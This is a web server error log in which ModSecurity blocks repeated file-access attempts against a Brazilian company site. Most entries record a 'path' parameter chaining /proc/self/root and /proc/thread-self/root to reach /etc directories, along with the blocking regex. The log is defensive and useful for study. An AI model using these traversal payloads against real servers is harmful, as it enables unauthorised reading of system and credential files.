[Mon Mar 16 08:56:45.680365 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:58530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfv_bysWC90G-1nBrAuewAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:56:48.011050 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:58540] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwALysWC90G-1nBrAugAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:57:02.461293 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:39370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwDo6lpbStxTqkSktWzwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:57:11.470289 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:44696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwF3jZBu2q05ozVU89tgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:57:50.083234 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:41454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwPrysWC90G-1nBrAuugAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:57:53.303245 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:53122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwQZqj1wV0Si-OkefRdAAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:57:55.682981 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:58102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwQ7ABkC4fWIHEf8HUAQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:57:57.520834 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.244.31:34292] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfwRbysWC90G-1nBrAuvQAAAY4"]
[Mon Mar 16 08:58:00.133027 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:58118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwSNSswJuvopo3lOhJEgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:58:04.949633 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:38724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwTAlT9VtDQc7bgUySmwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:58:07.911550 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:50666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwT9SswJuvopo3lOhJFAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:58:11.333148 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:38028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwUwlT9VtDQc7bgUySpwAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:58:16.200869 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:57512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwWI6lpbStxTqkSktW7AAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:58:18.584100 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:57528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwWrABkC4fWIHEf8HUDQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:58:38.116082 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:50680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwbtSswJuvopo3lOhJNgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:58:42.746976 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:51550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwcglT9VtDQc7bgUySvAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:59:04.321149 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:39764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwiP9ocpUE4ed4uDzWWAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:59:27.838506 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:53320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfwn46lpbStxTqkSktXOgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:00:23.806409 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.228.16:39478] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfw1wlT9VtDQc7bgUyS8QAAAQ0"]
[Mon Mar 16 09:00:27.858627 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:59402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfw25qj1wV0Si-OkefSAwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:00:45.570738 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:37040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfw7XjZBu2q05ozVU8-XAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:00:56.163080 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:42834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfw-Jqj1wV0Si-OkefSGQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:01:02.641944 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.243.203:59874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfw_nbQATo66fKoS7w0mwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:01:03.959664 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:58148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfw__9ocpUE4ed4uDzWcQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
